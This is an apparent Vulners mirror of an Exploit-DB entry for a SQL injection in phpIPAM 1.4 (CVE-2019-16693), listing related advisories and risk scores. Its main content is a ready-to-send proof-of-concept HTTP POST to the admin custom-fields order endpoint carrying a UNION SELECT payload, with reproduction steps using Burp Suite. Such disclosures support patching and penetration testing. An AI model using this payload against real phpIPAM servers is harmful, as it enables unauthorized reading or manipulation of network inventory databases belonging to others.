Lucene search
K

phpIPAM 1.4 - SQL-Injection

🗓️ 03 Dec 2025 00:00:00Reported by CodeSecLabType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 139 Views

SQL injection in phpIPAM 1.4 via admin custom-fields order, requires a valid session.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-16693
4 Dec 202521:02
circl
CVE
CVE-2019-16693
22 Sep 201914:58
cve
Cvelist
CVE-2019-16693
22 Sep 201914:58
cvelist
EUVD
EUVD-2019-7247
7 Oct 202500:30
euvd
NVD
CVE-2019-16693
22 Sep 201915:15
nvd
OpenVAS
phpIPAM <= 1.4 Multiple SQLi Vulnerabilities
25 Sep 201900:00
openvas
OSV
CVE-2019-16693
22 Sep 201915:15
osv
Packet Storm
📄 phpIPAM 1.4 SQL Injection
3 Dec 202500:00
packetstorm
Prion
Sql injection
22 Sep 201915:15
prion
Positive Technologies
PT-2016-4560 · Php +4 · Phpmailer +4
29 Dec 201600:00
ptsecurity
Rows per page
# Exploit Title: phpIPAM 1.4 - SQL Injection 
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.4
# Tested on: Windows
# CVE : CVE-2019-16693


Proof Of Concept
# Ensure you have a valid user session before executing the PoC.

POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session_id>

table=test_table%60+UNION+SELECT+1%2C2%2C3+--+&current=non-empty&next=non-empty&action=add


Steps to Reproduce
1. Login as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
3. Observe the result

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Dec 2025 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
CVSS 3.19.8
EPSS0.23793
139